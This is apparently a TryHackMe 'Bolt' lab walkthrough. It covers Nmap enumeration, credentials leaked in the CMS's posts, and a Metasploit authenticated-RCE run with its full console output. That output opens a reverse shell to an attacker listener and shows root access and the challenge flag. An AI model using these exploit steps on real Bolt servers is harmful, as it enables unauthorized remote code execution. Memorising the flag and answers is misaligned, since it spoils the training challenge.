TryHackMe-Bolt

From aldeid
Jump to navigation Jump to search

A hero is unleashed.

This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. You should wait for at least 3-4 minutes for the machine to start properly.

If you have any queries or feedback you can reach me through the TryHackMe Discord server or through Twitter.

#1

What port number has a web server with a CMS running?

Let’s start by enumerating the services running on the machine with Nmap:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Sat, 22 Aug 2020 06:41:24 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Sat, 22 Aug 2020 06:41:24 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: 4a1f52
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Sat, 22 Aug 2020 06:41:23 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Sat, 22 Aug 2020 06:41:23 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: e86e48
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
|_http-generator: Bolt
|_http-title: Bolt | A hero is unleashed

[REDACTED]

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap reveals 3 open ports, and Bolt is running on the highest port: 8000.

#2

What is the username we can find in the CMS?

Browsing the CMS on port 8000 reveals a message from Jake (Admin) that discloses his username: bolt:

Hello Everyone,

Welcome to this site, myself Jake and my username is bolt .I am still new to this CMS so it can take awhile for me to get used to this CMS but believe me i have some great content coming up for you all!

Regards,

Jake (Admin)

Answer: bolt

#3

What is the password we can find for the username?

In another post, the password is also revealed:

Message for IT Department

Hey guys,

i suppose this is our secret forum right? I posted my first message for our readers today but there seems to be a lot of freespace out there. Please check it out! my password is boltadmin123 just incase you need it!

Regards,

Jake (Admin)

Answer: boltadmin123

#4

What version of the CMS is installed on the server? (Ex: Name 1.1.1)

Let’s authenticate against the admin interface (http://10.10.177.138:8000/bolt/login) with the credentials gathered previously.

The version is disclosed in the bottom left corner.

Answer: bolt 3.7.1.

#5

There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?

Using searchsploit, we can find an “Authenticated Remote Code Execution” exploit affecting version 3.7.0 (EDB-ID 48296):

unknown@kali:/data/Bolt$ searchsploit bolt
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow           | multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery                                       | php/webapps/47501.txt
Bolt CMS 3.6.4 - Cross-Site Scripting                                              | php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution                | php/webapps/46664.html
Bolt CMS 3.7.0 - Authenticated Remote Code Execution                               | php/webapps/48296.py
Bolt CMS < 3.6.2 - Cross-Site Scripting                                            | php/webapps/46014.txt
Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow                            | multiple/remote/24982.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities        | php/webapps/36552.txt
BoltWire 6.03 - Local File Inclusion                                               | php/webapps/48411.txt
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities                        | php/webapps/21132.txt
CMS Bolt - Arbitrary File Upload (Metasploit)                                      | php/remote/38196.rb
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Answer: 48296

#6

Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit? (Ex: exploit/….) Note: If you can’t find the exploit module its most likely because your metasploit isn’t updated. Run apt update then apt install metasploit-framework

Answer: exploit/unix/webapp/bolt_authenticated_rce

#7

Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit

$ msfconsole -q
msf> use exploit/unix/webapp/bolt_authenticated_rce
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set rhost 10.10.13.119 
rhost => 10.10.13.119
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set username bolt
username => bolt
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set password boltadmin123
password => boltadmin123
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set lhost 10.8.50.72
lhost => 10.8.50.72
msf5 exploit(unix/webapp/bolt_authenticated_rce) > exploit 

[*] Started reverse TCP handler on 10.8.50.72:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "mpizfg".
[*] Found 2 potential token(s) for creating .php files.
[+] Deleted file voagtvfn.php.
[+] Used token ea38f97e6971032c9ecad6346a to create xfdhvqmbfjo.php.
[*] Attempting to execute the payload via "/files/xfdhvqmbfjo.php?mpizfg=`payload`"
[*] Command shell session 1 opened (10.8.50.72:4444 -> 10.10.13.119:43148) at 2020-08-22 22:45:11 +0200
[!] No response, may have executed a blocking payload!
[+] Deleted file xfdhvqmbfjo.php.
[+] Reverted user profile back to original state.

#8

Look for flag.txt inside the machine.

SHELL=/bin/bash script -q /dev/null
root@bolt:~/public/files# whoami
whoami
root
root@bolt:~/public/files# cd /home
cd /home
root@bolt:/home# ls -la
ls -la
total 288
drwxr-xr-x  3 root root   4096 Jul 18 19:36 .
drwxr-xr-x 27 root root   4096 Jul 18 19:30 ..
drwxr-xr-x 10 bolt bolt   4096 Jul 18 20:51 bolt
-rw-r--r--  1 root root 277509 Jul 18 19:36 composer-setup.php
-rw-r--r--  1 root root     34 Jul 18 19:33 flag.txt
root@bolt:/home# cat flag.txt   
cat flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Answer: THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}